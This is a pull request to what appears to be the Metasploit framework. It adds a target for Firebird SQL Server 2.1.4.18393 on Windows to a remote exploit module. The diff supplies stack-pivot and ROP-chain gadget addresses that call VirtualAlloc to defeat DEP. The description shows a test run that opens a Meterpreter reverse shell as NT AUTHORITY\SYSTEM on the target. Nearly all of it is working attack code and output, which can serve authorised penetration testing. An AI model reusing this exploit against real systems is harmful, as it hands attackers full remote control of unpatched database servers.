### PR TITLE
Add a target for Firebird 2.1.4.18393

### DIFF
--- a/modules/exploits/windows/misc/fb_cnct_group.rb
+++ b/modules/exploits/windows/misc/fb_cnct_group.rb
@@ -48,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'     =>
 				[
-					# pivots are pointers to stack pivots
+					# pivots are pointers to stack pivots of size 0x28
 					[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
 					[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
 					[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
+					[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
 					[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
 				],
 			'DefaultTarget'  => 0,
@@ -124,9 +125,17 @@ class Metasploit3 < Msf::Exploit::Remote
 			rop_chain = [
 				0x0055b844,		# MOV EAX,EDI # RETN [fbserver.exe]
 				0x4a86ee77,		# POP ECX # RETN [icuuc30.dll]
-				0x000001c0,		# 0x000001c0-> ebp
+				0x000001c0,		# 0x000001c0-> ecx
 				0x005aee63,		# ADD EAX,ECX # RETN [fbserver.exe]
 				0x4a82d326,		# XCHG EAX,ESP # RETN [icuuc30.dll]
+			].pack("V*")
+		when 'Windows FB 2.1.4.18393'
+			rop_chain = [
+				0x0042264c,		# MOV EAX,EDI # RETN [fbserver.exe]
+				0x4a8026e1,		# POP ECX # RETN [icuuc30.dll]
+				0x000001c0,		# 0x000001c0-> ecx
+				0x004c5499,		# ADD EAX,ECX # RETN [fbserver.exe]
+				0x4a847664,		# XCHG EAX,ESP # RETN [icuuc30.dll]
 			].pack("V*")
 		when 'Debug'
 			rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
@@ -196,7 +205,27 @@ class Metasploit3 < Msf::Exploit::Remote
 				0x00577605,	# POP EAX # RETN [fbserver.exe]
 				0x90909090,	# nop
 				0x004530ce,	# PUSHAD # RETN [fbserver.exe]
-			].flatten.pack("V*")
+			].pack("V*")
+		when 'Windows FB 2.1.4.18393'
+			rop_chain = [
+				0x4a843429,	# POP ECX # RETN [icuuc30.dll]
+				0x005ca120,	# ptr to &VirtualAlloc() [IAT fbserver.exe]
+				0x0055a870,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
+				0x004cecf6,	# XCHG EAX,ESI # RETN [fbserver.exe]
+				0x004279c0,	# POP EBP # RETN [fbserver.exe]
+				0x0040747d,	# & call esp [fbserver.exe]
+				0x004ebef1,	# POP EBX # RETN [fbserver.exe]
+				0x00001000,	# 0x00001000-> ebx
+				0x4a864c5e,	# POP EDX # RETN [icuuc30.dll]
+				0x00001000,	# 0x00001000-> edx
+				0x004eaa3b,	# POP ECX # RETN [fbserver.exe]
+				0x00000040,	# 0x00000040-> ecx
+				0x4a8330a2,	# POP EDI # RETN [icuuc30.dll]
+				0x00423b82,	# RETN (ROP NOP) [fbserver.exe]
+				0x0046b5b1,	# POP EAX # RETN [fbserver.exe]
+				0x90909090,	# nop
+				0x004c8cfc,	# PUSHAD # RETN [fbserver.exe]
+			].pack("V*")
 		when 'Debug'
 			rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
 		end


### PR DESCRIPTION
Adds support for Firebird SQL version 2.1.4.18393 on Windows.

Version 2.1.4.18393 can be downloaded from here:
http://www.firebirdsql.org/en/firebird-2-1-4/

Tested on Windows 7 SP1.

```
msf3-git (S:1 J:0)  exploit(fb_cnct_group) > show options 

Module options (exploit/windows/misc/fb_cnct_group):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.90.189   yes       The target address
   RPORT  3050             yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.90.184   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Windows FB 2.1.4.18393


msf3-git (S:1 J:0)  exploit(fb_cnct_group) > exploit

[*] Started reverse handler on 192.168.90.184:4444 
[*] 192.168.90.189:3050 - Sending Connection Request For C:\CDIPsRpstMDZP.fdb
[*] Sending stage (752128 bytes) to 192.168.90.189
[*] Meterpreter session 4 opened (192.168.90.184:4444 -> 192.168.90.189:49188) at 2013-03-13 13:43:55 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```
